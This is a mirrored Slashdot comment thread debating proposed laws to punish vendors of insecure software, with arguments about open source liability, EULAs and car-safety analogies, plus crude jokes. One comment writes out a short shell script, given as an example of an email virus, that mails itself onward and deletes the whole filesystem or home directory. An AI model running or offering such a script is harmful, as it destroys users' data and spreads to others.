Slashdot Mirror
Laws to Punish Insecure Software Vendors?
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
A visiting professor at the University of Alabama is giving a seminar on the supernatural. To get a feel for his audience, he asks:
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
Slashdot, come for the goatse, stay for the trolls.
What will this mean for open source? OSS companies/programmers will be just as liable as closed source ones.
So this means that if i configure my computer without a password i can sue the manufactuere for defective security in their software if it gets hacked.... Cool
</SARCASM>
I will bend your mind with my spoon
Aimed at Microsoft, George Bush's friends in Redmond. Asking for them and others to actually produce secure and reliable software, and making them responsible for their actions.
Sounds ridiculous that this shouldn't already be covered by things like Consumer Protection but in fact those licenses make sure that they have no responsibilities. And no-one is going to change that in the US when there is a president who doesn't want to prosecute for monopolistic practice the bigger violator of security concerns out there.
An Eye for an Eye will make the whole world blind - Gandhi
How do you quantify what is doing enough? If they release a patch in two weeks is that enough? How about 4? Is releasing a patch not enough? Should they actually call people and tell them to install a patch that has been out for months? I mean there is no doubting that Microsoft software has holes but they do patch them. The question is do the do it fast enough and do they make it required for users.
Be careful what powers you give to the government.
[ home ]
So, if a law like this is passed, will the people who break it be branded IT Terrorists? I mean, everything else is terrorism now, why stop here?
Linux, Solaris, HP-UX, MS WIndows and a bunch of other products have holes in them that SANS tells others about. Has there ever been a piece of software with no security holes?
Your software is insecure. Please pay your fine by credit card at http:// ...
Sigs are so 1990s. No way would I be seen dead with one.
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
I think I'll stop here.
Reconsidering that plaintext cookie in my browser that holds my account password, are we?
--
What happens when you outlaw guns
This is definately a double edged sword. This could bite anyone on the ass. MS doesn't hold a monopoly on crap code (arguable). What happens to people who don't sell the software, but wrote and make money on its support? (I'm thinking of Apache here).
So.. if a company lobbies against this law, wouldn't that open them up to criticizm? I mean, it'd essentially be like them saying "we don't want to be responsible for our insecure software."
This raises some constitutional issues - Do I have the right of freedom of speech ( as code has been found to be in some cases ) to utter an incorrect program?
An additional question would be should all software now come with a warrently that specifically disclaims the implied warrenty and states that there is no warrenty? Would it be legal under the proposal?
There's a gorilla from Manilla whose a fella that stinks of vanilla and has salmonella.
Seems to me this will have the least impact on those who need to pay attention to security the most(large software companies) while having the potential to make it harder for the "little guy" to write and publish software.
No, Thursday's out. How about never - is never good for you?
Anyone ever read their full End User Licence Agreements, especially MS?
It always has a limit that anything bad that happens while using their product is not their fault.
Now IANAL but I thought that by clicking I Agree, that you were actually agreeing to that.
I suspect that this would ensure far less software gets produced by smaller vendors and individuals who can't afford the liability.
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
My poetry site welcomes the unusual.
But Windows XP is not the only Microsoft product with security failings.
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
draft laws that would punish software firms that do not do enough to make their products secure
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employees 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
You are in a maze of twisty little passages, all alike.
Imperium et libertas
Autocracy and freedom
Laws that make a vendor produce a secure and safe product should apply to software too.
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, but the responsibility where it lies. If I put a system out on the net, and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If you produce a product that doesn't meet the "reasonable" man test for care in producing the product, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable and bug-free and secure. (Go read the "Software Conspiaracy") Sure it will cost more, but what do you think all the virus outbreaks costs business and individuals. It's just a hidden tax. MS (and others) are just shifting the burden of producing software that works to the users. It's cheaper for MS to produce the software, but lots more expensive for the user to use them.
Finally, the legal system _IS_ part of the free market. The threat and actual loss of damages to a plaintiff balance the system of the market. It's not just buyers and sellers - and a wild wolly mess...
It just bugs me when "free market" proponents want to proclaim that the courts are unneccessary in the free market - bull! They are important and the market will not function correctly without them!
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
Do they really think more regulation is going to improve software? All this will do is make companies put time and effort into "compliance" instead of fixing problems users are asking for
Free cell phone tracking
The US National Academy of Sciences (NAS) has released drafts of a report commissioned after 11 September to look at the state of America's computer systems.
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
While the concept to "punish" vendors for flawed products is a good one, trying to get the _government_ to do it is a bad one. For one reason, the government is very easily corrupted, and often looks the other way.
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, they damn well better be that.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
Where laws are concerned one must always tread carefully. What they are proposing is criminal penalties for security flaws. Imagine if the authors faced liability for writing ftpd with back dores in it. Whould people still be willing to write free software if that little disclaimer doesn't work any more?
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
We really need fair competition in computer software again. If there were reasonable alternatives (yes *we* know there are, but most companies are pretty clueless wrt actual computer-based solutions), there would be NO NEED for this law, as the better software *should* do better in the marketplace.
Not to sound insensitive to the software security issue, but going down this path simply encourages massive efforts at hacking one camp's software to further one's own favorite.
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Ya Sure! You Betcha!, The_THOMAS
Translating this to the software world, frankly, makes my head explode just thinking about it. Consider:
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc. indicating it's 'safe'. That would at least enable the marketplace to decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this akin to 'quality' certification along the lines of ISO9001/2 processes(??).
CrazyLegs
"Pork!!" said the Fish, and we all laughed.
Why not, if you get a non-functional/debilitated automobile in most states the dealer is required to buy it back if they can't fix it quickly. If they can however, you keep the fixed car. What a concept!
And real basic liability -- their product does what their marketing claims say it will, or they fix it or take it back and provide some kind of refund.
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
This is bad news for anyone dabbling in software development, you make a piece of software to do something (in your opinion) useful, release it on your website where a few dozen download it, it spreads a bit more, and suddenly, someone somewhere does something that provokes your app to crash, or be used, in a nasty way taking out their box and the boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only after a developer clearly states and guarantees that his software will not in any way harm the users equipment, or, very gross neglect from the developer and failing to provide even rudimentary security.
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
What if Linus got hauled into court after ext2fs ate someone's data?
Best Slashdot Co
The software producer's liability should be limited to the amount of their financial return on the software, except in cases where gross negligence is apparent. If I never made a dime of the sale of the software, I should be liable only for that $0.
Open source developers face new warranty threat
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute..." is joined by a provision that nullifies the exception for software licensed to consumer
The complete text can be found here....
a) Except as provided in subsection (b), the warranties under Sections 401, and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
Do you really think that if this becomes a Bill with any serious chance of passing Microsoft won't have lobbied sufficiently to get it to pose a threat to its most serious competition? (Linux and OSS)
The market should work this issue out on its own if it is healthy.
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
obviously no deficiencies vs. no obvious deficiencies
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and current known virii/worms/other explotations roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements one they've been exploited.
That's ridiculous, how many times have you heard of a commercial company being liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Stupid sexy Flanders.
I do think companies like Microsoft need to take more responsibility for the huge gaping security holess in their products but I'm not legislature is the right way to go about it. I do think consumers need to be better informed. When a Ford recalls a few vehicles over some potential saftey hazzard it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Whatever happened to the good old days, where if a product was notoriously unsafe and insecure, that consumers simply refused to buy the product? The manufacturer's only choice then was to either fix the problems, or cease production.
If we bought cars with the same lack of discern that we buy software, Chevrolet could bring back the Corvair.
Already a member of the Green Party, thanks.
Be careful what powers you let corporations have when you let them run amok without government regulation.
Remember "Bring 'em on"? *sigh
So would it be legal to hack again? Or would hacking a system to prove it's insecure cancel the other one out.
. . . we might want to consider that while "security" can mean keeping your machine from being 0wn3d, it can also mean "security" as in the Security Systems Standards and Certification Act, otherwise known as the "Enforced Copy Control and Free Operating System Elimination Act."
CEE5210S The signal SIGHUP was received.
Be careful what powers the governments assigns to its proxies.
...
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent,
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
Infuriate left and right
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to:
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Long, cute, or funny Sigs are just another form of over compensation, used by geeks, nerdz, etc.
This is another one of those catch-all blanket decisions that seem alright at first thought but if you apply to all cases, you see that it is just disastrous. Let's look who it affects the most
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, all (Microsoft) software will be beta
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their hard. "YMMV, maybe you like it maybe you don't. No warranty". Maybe it is superb. But it might have a horendous bug. So people will no longer release freeware
OPEN SOURCE
Same as above but with source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc). What if in some new iteration of Apache, there is a security hole and this will happen. Can people sue for this?! Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be ok (Apache, Linux Kernel). Microsoft might just last a little longer than expected due to security through obscurity but of course they too will perish
The end of software =)
After the US government begins its new laws in the area of data and intellectual property, i have some more they could add:
1. The Crap Film and Television Act, will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from bordom from watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act, will ban all pop-up adverts. This will tie-in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act, will ensure that all boy-bands are securely locked-up. If a record company tries to bring them to a studio or gig, they will be punished.
This comment does not represent the views or opinions of the user.
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
Think carefully... how do you make software secure in the first place? Microsoft try to go through extensive software testing to detect bugs. Who knows, maybe if test software is good enough, they can catch most bugs
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
Almost all of the serious virus outbreaks of the last two years can be traced to vulnerabilities in Microsoft products.
I'm not fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all goes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
mail next@victim < $0
if [ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice, basically every single complaint about Microsoft insecurities were due to ease-of-use features. Outlook executes attachments, it's much easier for users to click on it to execute it. The web server exploits targeted extra services Microsoft added to make things easier for people who want to use those features. And our good pal Clippy, again, another ease-of-use feature. If people were more knowledgable about computers there would be no need for these extra features and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users is just as important, if not more.
Excessive regulation will increase the entry cost of doing business for the little guy. Regulation is nothing but a speed bump to the really large companies like Microsoft, Oracle, Sun, etc.
We have been lucky that the software industry has been left alone for so long, but it is only a matter of time now.
I Heart Sorting Networks
Software companies, held liable for the security of their products, would certainly apply as much pressure as possible to punish crackers. Since so many crackers come from outside the United States, that could really lead to interesting international law enforcement and judicial scenarios - not necessarily pretty ones, either.
Read the EFF's Fair Use FAQ
main_function(){u serinput());
if(stdlib.getuserid() != "root") then exit "You need to have root priveleges to run this program.";
else stdlib.execute_arbitrary_external_prog(stdlib.get
}
But the following I would not:
main_function(){
// running as root
integer buflen = 5000;
stdlib.bounds_checked_read_input (stdlib.getuserinput(), buflen);
drop_root_privs();
}
even though the latter may represent a format string vulnerability.
(Entered in pseudocode lest someone get the cute idea to actually sue me)
The Ford Pinto.
We have laws that tell auto manufacturers how they can build cars. Not in detail, no, but they have to meet certain standards or they just aren't legal to make. Note that business concerns don't enter into it. Making the Ford Pinto the way they did originally was a good business decision. It really did cost Ford less to pay out the death claims than to improve the car. It even arguably benefitted the consumers, because lower costs to Ford meant a lower price on the car and consumers were still buying them even after the problem became public so people obviously wanted them. The courts still held Ford criminally liable for building a car that blew up and killed people when they could easily have built one that didn't.
So why should we treat software any differently?
It's a stupid idea.
Quality, security, unbugliness (is that a word?) cost time, and time is money. It's not like you can just pass a law that mandates it, and then everyone gets it for free.
Different uses have different needs. Wayne and Garth's cool discussion board doesn't need as much quality as the receptionist's inventory report, which doesn't need as much quality as NASA's space shuttle stuff.
You use discretion and intelligence and decide how much quality and risk and cost you want, and do what is best. Laws against shitty code, would needlessly reduce options, and let's face it: sometimes shitty code is good enough to get the job done.
The right place for mandating security decisions is when the customer is making demands of the vendor. So if the government wants a law that the software they buy has to be secure, that's better (but still probably not completely wise). But don't spoil it for the rest of us by trying to protect us from using shitty software. The last thing I want is another case of the government protecting me from my own decisions.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
As long as we're making obvious statements...be careful what you stick up your nose.
P.S. The government has all the power. Last I checked, I don't have an armored battalion in my back yard.
Comment removed based on user account deletion
It should be enough to just make the software companies liable for some of the damages cause by insecure software they made. That should be enough make insecure software disappear.
The problem would be, that there are several issues with open source software and smaller software firms. Open source software, freeware and to some extend shareware must be excluded from an extension of the liability because no one would develope free (free as beer) software when he risks to pay for damages caused by security holes.
Jan
That doesn't change the fact that they did not<blink> define the word "security" in the way you allege. Did it ever occur to you that what you quote there might be spin?
CEE5210S The signal SIGHUP was received.
The state of Texas has been licensing software engineers since 1998, and there is a push in software development professional organizations to have other states adopt this view of the software profession as well. With licensure come liability.
Consumer advocates have been pushing for an end to warranty disclaimers in software for some time.
This just adds another iron to an already burning fire.
I think that all of this is good and possibly of no harm to Free Software if implemented correctly. I.e. reasonable -- but not complete -- exemption for non-commercial software, not just OSS (see my other post re: Limited Liability); penalty according to degree of negligence, speed of response to notification, etc.
Comment removed based on user account deletion
not at all. In fact IE is a horrible example. You get IE whether you want it or not. Remember it is a part of the M$ Windows OS. Since it is part of the OS, you are paying for it. Its part of the product.
.. wtf am I smoking these days)
Take for example ncftpd. Gleason can not say "hey, when you buy my product all your buying is the "IO logging facility", the rest of it is free. And OBTW, the only way you can get the rest of the program for free is to buy the logging facility. Therefore I am not liable for anything bad that may happen to the rest of it since it is free.
On the otherhand, this law might change M$'s mind on how they package up there OS. Outlook and IE might turn to be "Free" packages available to be installed but not need. (gawd
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
If companies faced lawsuits and financial penalties when vulnerabilities were found and exploited, they would strongly discourage white-hat hacking, independant vulnerability testing, etc. It would be in Microsoft's best interests to immediately sue anyone who reports a flaw. (White hat hacking violates US law just as black hat does.)
Lawyers would start to be accused of Bugtraq chasing.
I used to support the Libertarians. Why should The Man have the right to tell idiots to wear helmets? Just make motorcycle riders carry enough insurance to cover their costs when they get non-fatal brain injuries (so I don't have to pay for their mistakes) and let them have fun.
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're at threat to all of us. I don't think we should ban alcohol, but I don't see a problem the state having the right to crack down on repeat drunk drivers because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstratively harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's sloddy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstratively harms others, so be it.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
The NAS, god bless 'em, tend to make their books available to the great unwashed; you have signed on for email updates, haven't you?
Well, just in case you haven't the draft report is available for online perusal here
PS I said NAS, not NSA. Just to be clear.
Um, yeah, that makes sense.
My beliefs do not require that you agree with them.
The government involvement needs to be limited to its activity as a consumer protection agent.
The government should review the questionable software and force RECALLs like they do with other dangerous products like toys and cars and stuff.
Making NEW law isn't needed here -- simply enforcing current law is enough.
is a "clause" in the law that simple state this.
A software company/programmer can only become liable should there product be sold for commercial value or profit. Software such as freeware or open source are not liable since they fall under the "what you see is what your get". Should the free program contain malicious or intentional security holes/problems, this clause becomes null and void.
But here is something else I did not see written by anyone else. Should such a law be passed, open source software will pretty much vanish from the business world. Seriously, what manager would really want to run it. Can't profit from it if it goes wrong, so why use it.
-- Knowing too much can get you killed, but knowing who knows too much can make you rich.
Many people don't probably realize it but this would be the best thing that could happen to Microsoft. To illustrate the point, consider the fact that US government institutions use almost exclusively Microsoft products but many people don't know that this is actually enforced by law.
There is a law that states that government may only use software, which has certain accessibility features (usable by vision impaired, for example). There is a big bunch of standard requirements that the software products must follow to be in compliance with this law. Now Microsoft is one of the very few companies that can afford compliance with this law.
Now consider what would happen with this proposal when it gets passed. Most probably it will be transformed into an arbitrary set of rather stupid standards and guidelines by our legislative bodies, and again, Microsoft would be the only one able to follow these standards.
When men used to be men
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, along side of the industry lobbyists, consumer advocates and politicians.
Americans that think preserving the fourth amendment is just about ripping DVDs and posting them to USENET are morons. But by the time they figure it out, it'll be too late.
Another proud carrier of the $rtbl flag
So does this mean I can sue Kwikset because some idiot took a chainsaw to the side of my house, sawed their way in and stole the watermelon out of my fridge?
After all, the package the lock was sold in implied it would make my house more secure.
Maybe I should sue Poulan because their chainsaw didn't have a warning label that said "use on house walls may cause personal injury due to possible presence of live electrical cabling." I'll bet that would've stopped the burglar.
Noooo....... I've got a better idea...... I'll sue the farmer that grew the watermelon. After all, he created an "attractive nuisance." And there's laws against that.
What about Whirlpool? My fridge doesn't have a factory-installed alarm system. How am I supposed to keep my watermelons secure? Let's sue the pants off of Factory Specification Parts!!
Give me my freedom, and I'll take care of my own security, thank you.
It's never a good idea to formalize issues like these into laws. Consumer preference and freedom of the market allows consumers to create a self correcting system. If there is a major problem with a product (not necessarily software), the consumers vote with their purchases or lack thereof. This can be seen in people turning away from firestone towards good year or corporations turning away from Windows servers towards Linux.
However, if corporations were to be fined because of vulnerabilities in their system, they would most likely pass the cost down to the consumers. Large corporations would probably purchase business insurance to cover these potential problems (the same way doctors have Medical insurance). However, it is the small companies that will suffer. Unable to afford insurance, the first major problem in their software could bankrupt a company leading to a small number of large corporations rather than a large number of small corporations.
Lastly, to be able to produce secure software, it is almost mandatory to understand computer science theories such as computability or complexity. This could lead to a requirement (not necessarily a law but a social requirement) for a programmer to be a licensed engineer. This is much in the same way that you need a civil engineer license to build bridges. I mean, just about anyone could build a bridge, but you need to understand civil engineering principles to ensure that the bridge functions to specifications.
_______________________________
"I'm not Conceited...I'm just a realist..."
What would Bill say?
"First they punish us for innovation, and now they want to punish us for feeling insecure? That's incredible! Memo to marketing: words beginning with 'IN' no longer to be used in PR materials."
it will also be used to justify criminalizing of people who find and reveal security exploits so that products "seem" more secure to joe clueless moron taxpayer because everyone who publicly states the truth will be silenced.
#include
main()
{
for(;;)
{
printf ("Hello World!\n");
}
}
Surely there's a security hole here somewhere. Give us enough time, we'll find it.
Give me my freedom, and I'll take care of my own security, thank you.
If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
Well if your bridge collapses then ill take my business to a competing bridge ;)
Sarcasm aside, the free market is the best way to sort out things such as optimal value. When there is a free, level, and liquid market, then it is the best choice.
I do believe that there is a sufficiently free market for OS's that no government regulation could help. (It could easily make things worse though). Even Microsoft uses unix to master their CD's, because their own OS is not secure enough to handle such a critical function. (anyone still have that link?)
ONLY in cases where the free market doesnt work (because of practical barriers to competition) (Utilities,Transportation, and "Last mile" Communications) should government oversight be accepted as the lesser evil. And in those area's, the government might restrict your right to produce faulty products.
PS: Free speach applies to source code, but not necesarrily to the commercial sale of source code. In cases where code is simply exchanged with no sale, contract, implicit guarantees, warantees, or other inference that the code is useful for any particular purpose, then no regulation or liability should be able to arise.
There is an ongoing argument that releasing things into the public domain could create liability for the releasor. Since it is fully possible to release things into the public domain anonymously, then the argument can be rendered moot. Just dont say who you are when you post things to freenet.
I see a lot of parallels to the patent process in this topic. Why is it that intellectuals, of all people, think that passing legislation that would lead to grossly subjective enforcement is good for an industry?
What will inevitably happen is that those who can demonstrate that they have procedures in place to remedy security holes (through patches, alerts, etc.) will be immune to enforcement efforts. The actual quality or security of the software itself will become irrelevant because no government funded operation will be able to measure quality appropriately. In other words, the evaluation process turns into the question: "How much are you spending in relation to your sales to ensure security of your products?", not "How secure are your products, and how important is security within your application?"
This terrorism argument is getting stale. How long will we let our government act as if intellectual property, private data, etc., are all our nation's collective interests. If the government wants to establish standards for software they purchase internally, fine. IMHO, that's a procurement issue, not one of industry regulation.
Let's let capitalism handle the rest naturally. Bottom Line:
- if a company promises that certain actions are secure, they're subject to civil suit if they fail
- if a company demonstrates a good track record for security and reliability and gives the greatest piece of mind, they will be the choice of enterprise business (i.e. Oracle, Sun, etc.)
I'm getting sick of the sentiment that government involvement in technology will improve the industry. The only industry this type of legislation helps is the legal industry, and having a massive legal industry for internal matters certainly does not promote economic growth.It's really very basic: ensuring better security is costly, and handling the threat of liabilities too (for example by buying insurance to cover the risk). These are costs and risks a large corporation (like Microsoft) may be able to handle, but for small outfit, or small open source projects it's much harder. Something the size of mozilla, or the linux kernel can afford good QA and will find backers to handle the risks, but small projects would be forced under the cover of some larger organisation or the distributors. Also, in the case of open source projects, the sponsors would demand some say in the development process, or maybe even licensing of the software. But small software makers are in a similar position: To handle the risk of litigation they'd need a backer, they won't have the resources until their Software sells well.
By charging higher premiums to insure companies using software with a bad track record, there are already market forces in place: include that difference in premiums in the TCO-calculations microsoft is so fond of to prove that Windows is cheaper than any competition, and make management aware of it (and make them wonder why that insurance company wants higher premiums for insuring against damages from security holes in that software).
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least, a better idea would be an independant (that's the hard part) organisation providing certification of software. Once that is established there could be legislation demanding minimum standards for software used in certain critic areas.
That way each software maker could choose how much to invest in security and QA, and it would be more transparent for customers how secure a product really is, so they wouldn't have to rely on the software-makers advertising for that kind of information. In effect the insurance conditions and premiums for different kinds of software are already an indicator for its security, and the insurance companies probably have a high interest in accurately estimating the risks, so probably they should play some part in ensuring the proposed organisations independance.
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
Great. A law that will punish developing companies who make a seldom used product that happens to have a security flaw that virtually no one knows about. It'd be great if we took away all their revenues while keeping their costs the same.
And for the real problems? Relax! IE is free.
With rights come responsibility. PJ O'Rourke said something along the lines of "Everyone has the right to do whatever they want, and the responsibility to accept the consequences."
Increasingly we are seeing laws aimed at reducing our responsibility. I don't know about where you might be, but in this country, it is the law that you have to wear a seatbelt in a car. More dramatically, modern VW Golfs (Rabbits in the States) weigh the better part of a tonne more than early models, entirely due to the safety devices that now have to be incorporated by law. The government is trying to legislate against dying if you drive stupidly. Don't get me wrong, these safety devices are very noble, but legislating they inclusion will continue until we have to drive at 5mph in cotton wool cars.
Laws to punish insecurity in software are precisely the same. I will not guarantee that my software will not blow up. I will not guarantee that it will not eat your enterprise. If you want me to guarantee these things, then you will not be able to afford the cost of my software, that I need to charge to pay my insurance bill.
You can legislate against all the responsibility in the world, but in the end, you will just have abdicated all your rights instead.
This rambling was bought to you by not_cub
q='echo "q=$s$q$s;s=$b$s;b=$b$b;$q"';s=\';b=\\;echo "q=$s$q$s;s=$b$s;b=$b$b;$q"
Read the comments above. I dont have a choice in using IE. It's tied to the OS; Microsoft admits it. You pay for the OS, so you pay for IE. So it'd better work. Same with Office. NOT the same for freeware I get from download.com, as it is my /choice/ to run that software, and I am not contributing to the resources that go into developing and testing it; ergo, in that scenario, I should be on my own.
"Old man yells at systemd"
Is Red Hat responsible for a collection of packages that they put together or just for the fine things they author and then sell? In other words, if I charge a fee for my ability to put things together for you, am I liable when those things don't work together?
I also worry for consultants. Can I deny the implied mechantability if I install Debian for you? Obviously you have hired me for a specific purpose and I'm supplying you with tools to meet that need.
There is a fine line here, and I'm not encourged by my government's recent direction on other matters such as DMCA. They can't be counted on to get the difference, or can they? Surely there are meat space equivalents to elucidate the problem, but I worry that common sense may be just as lost here as it is in the confidentiality of email vrs US post and phone calls.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
"An influential body of researchers..."
If these guys were any good at research, they would have noticed that the largest single contributor to both the Democratic and Republican presidential campaigns (Not to mention plenty of other campaigns worldwide.) was Microsoft, the mother of all "... software firms that do not do enough to make their products secure." and realize that they have no hope of getting these laws passed in the US.
> I'm not sure it's fair to hold Microsoft responible for making
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
